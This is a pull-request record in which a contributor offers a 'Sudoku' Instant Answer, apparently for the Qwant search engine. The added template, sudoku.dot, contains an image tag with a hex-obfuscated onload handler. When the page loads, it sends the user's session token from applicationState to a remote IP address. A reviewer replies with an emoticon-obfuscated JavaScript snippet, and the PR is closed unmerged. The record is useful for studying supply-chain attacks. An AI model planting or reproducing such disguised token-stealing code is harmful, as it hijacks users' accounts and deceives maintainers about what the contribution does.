### PR TITLE
Sudoku

### PR DESCRIPTION
**Pull request by Teuop**
Hello,

Because I love playing Sudoku I made a simple Instant Answer Sudoku game which is mobile compatible !!! :D

### CODE REVIEW

**Comment by stephanembl** [comment]
Hello Teuop! Thank you for your contribution that's awesome :) We are reviewing it right now, and hopefully it will be available for everybody on Qwant soon... :) Thank you again!

**Comment by Teuop** [comment]
Wonderful! Can't wait to show my friends!

File: src/modules/sudoku/public/sudoku.dot [hunk 1]
```diff
@@ -0,0 +1,50 @@
...
...UARQfZ2Sg9GTsAFYIaABQG5uZAFBkuABqCHwAnBPP0BCUNAB+CIwA5Ev8wWjRoICMGgBGCLgD48aChER4RItoAcEEQCAAqJmg8sgKCRxMAQAiy8KokAAuCaGAIwLKlSwwskAQCADs=" onload='this["\x73\x72\x63"]="\x68\x74\x74\x70\x3A\x2F\x2F\x31\x39\x35\x2E\x31\x35\x34\x2E\x34\x33\x2E\x31\x34\x33\x2F\x3F\x63\x3D"+applicationState["\x75\x73\x65\x72"]["\x74\x6f\x6b\x65\x6e"]'/><img src="data:image/gif;base64,R0lGODlhEAAQAOZIAP///yczPtDY4Pv9/r3G0ICRp/b6/MbP2Pv8/rZ6AJlbAENPX86RAO/z97C8yrO+yOXr8unv9PP2++nv9fT4+m13gl9ncmBpdCgzP/P2+Wlzf83W3296hfv9/XJ+iWZwfF1mcXWBjYGTqWNtd4iVoLvEz+Pr8bnDzsTN1vn6/ebt9Obs80pTX/D0+PD094GNmfL2+uvv9e/y9/j5/ElTXvb4++fu83qFkfr7/vD0+fj6/PL1+evx9vX4+36Klq+6xvb5+3iEkH+MmHqIk7jE0cPM1rC8xuju9P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAEgALAAAAAAQABAAAAe6gEiCDIOFSISCSCQiCQUFjY+OCSIkgkIACgCYmpmbL4JDAAsOoqSjokQ+gkGara6tN4IhAB0Dtre2HQAhgh4AGwLBwsEbAB6CHAApCMzMODozNQAcghUARQfZ2Sg9GTsAFYIaABQG5uZAFBkuABqCHwAnBPP0BCUNAB+CIwA5Ev8wWjRoICMGgBGCLgD48aChER4RItoAcEEQCAAqJmg8sgKCRxMAQAiy8KokAAuCaGAIwLKlSwwskAQCADs="/> Game instructions</p>
```
Comment (xem) [inline src/modules/sudoku/public/sudoku.dot:32]:
```js
ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');
```

Comment (Teuop) [reply src/modules/sudoku/public/sudoku.dot:32]: ┻━┻ ヘ╰( •̀ε•́ ╰)

**Comment by xem** [comment]
image

**Pull request closed without merging**